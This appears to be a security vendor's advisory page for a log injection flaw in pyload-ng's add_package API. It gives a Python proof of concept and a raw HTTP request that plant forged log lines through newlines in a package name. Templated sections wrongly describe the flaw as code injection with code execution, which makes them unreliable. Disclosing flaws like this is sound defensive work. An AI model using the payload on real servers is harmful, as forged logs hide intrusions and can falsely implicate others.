GHSA-3WWM-HJV7-23R3

GHSA-3WWM-HJV7-23R3 is a medium-severity code injection vulnerability in pyload-ng (pip), affecting versions <= 0.5.0b3.dev89. No fixed version is listed yet.

Summary

A log injection vulnerability was identified in pyload in API /json/add_package. This vulnerability allows user with add packages permission to inject arbitrary messages into the logs gathered by pyload.

Details

pyload will generate a log entry when creating new package using API /json/add_package. This entry will be in the form of Added package 'NAME_OF_PACKAGE' containing 'NUMBER_OF_LINKS' links. However, when supplied with the name of new package containing a newline, this newline is not properly escaped. Newlines are also the delimiter between log entries. This allows the attacker to inject new log entries into the log file.

PoC

Run pyload in the default configuration by running the following command

pyload

We can now sign in as the pyload user who at least have add packages permissions. In my example, I will use the admin account to demonstrate this vulnerability. Now as an admin user, view the logs at http://localhost:8000/logs

Any attacker who at least have add packages permissions can now make the following request by crafting a python code to inject arbitrary logs.

import requests

session = requests.session()

burp0_url = "http://localhost:8000/json/add_package"
burp0_cookies = {"pyload_session_8000": "SESSION-ID-HERE"}
burp0_headers = {"sec-ch-ua-platform": "\"Windows\"", "Accept-Language": "en-US,en;q=0.9", "sec-ch-ua": "\"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"138\"", "sec-ch-ua-mobile": "?0", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf", "Origin": "http://localhost:8000", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost:8000/collector", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
burp0_data = "------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\nContent-Disposition: form-data; name=\"add_name\"\r\n\r\nFake new package containing 1 links\r\n[2025-07-23 04:32:19]  PWNED               SeaWind  GET PWNED\r\n[2025-07-23 04:32:19]  INFO                pyload Added package Normal package\r\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\nContent-Disposition: form-data; name=\"add_links\"\r\n\r\n123\r\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\nContent-Disposition: form-data; name=\"add_password\"\r\n\r\n123\r\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\nContent-Disposition: form-data; name=\"add_file\"; filename=\"tt\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\r\nContent-Disposition: form-data; name=\"add_dest\"\r\n\r\n0\r\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf--\r\n"
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

The Burpsuite HTTP Request for the above code

POST /json/add_package HTTP/1.1
Host: localhost:8000
Content-Length: 799
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8000/collector
Accept-Encoding: gzip, deflate, br
Cookie: pyload_session_8000=SESSIONS-ID-HERE
Connection: keep-alive

------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_name"

Fake new package containing 1 links
[2025-07-23 04:32:19]  HACKER               SeaWind  GET PWNED
[2025-07-23 04:32:19]  INFO               pyload Added package Normal package
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_links"

123
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_password"

123
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_file"; filename="tt"
Content-Type: application/octet-stream


------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add_dest"

0
------WebKitFormBoundaryqRJM6zIUcE7ttXDf--

After executing the following python code and send the request successfully, if we now were to look at the logs again, we see that the entry has successfully been injected.

Impact

Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act.

Untrusted input is evaluated as executable code within the application's runtime environment. Typical impact: arbitrary code execution within the application's privilege context.

GHSA-3WWM-HJV7-23R3 has a CVSS score of 4.3 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

pyload-ng (<= 0.5.0b3.dev89)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

No fixed version is listed for GHSA-3WWM-HJV7-23R3 yet.

In the interim: Never evaluate untrusted input as code. Use sandboxed evaluation environments if dynamic execution is required.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-3WWM-HJV7-23R3? GHSA-3WWM-HJV7-23R3 is a medium-severity code injection vulnerability in pyload-ng (pip), affecting versions <= 0.5.0b3.dev89. No fixed version is listed yet. Untrusted input is evaluated as executable code within the application's runtime environment.
  2. How severe is GHSA-3WWM-HJV7-23R3? GHSA-3WWM-HJV7-23R3 has a CVSS score of 4.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of pyload-ng are affected by GHSA-3WWM-HJV7-23R3? pyload-ng (pip) versions <= 0.5.0b3.dev89 is affected.
  4. Is there a fix for GHSA-3WWM-HJV7-23R3? No fixed version is listed for GHSA-3WWM-HJV7-23R3 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is GHSA-3WWM-HJV7-23R3 exploitable, and should I be worried? Whether GHSA-3WWM-HJV7-23R3 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-3WWM-HJV7-23R3 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-3WWM-HJV7-23R3? No fixed version is listed yet. In the interim: Never evaluate untrusted input as code. Use sandboxed evaluation environments if dynamic execution is required.

Other vulnerabilities in pyload-ng

CVE-2026-46561CVE-2026-45348CVE-2026-45306CVE-2026-44226CVE-2026-42315

Stop the waste.
Protect your environment with Kodem.